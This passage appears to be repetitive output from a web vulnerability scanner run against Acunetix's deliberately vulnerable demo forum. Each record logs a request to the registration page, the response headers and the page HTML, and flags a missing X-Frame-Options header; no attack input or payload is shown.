<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 364 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3549 |
| Response Body - size: 3,549 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
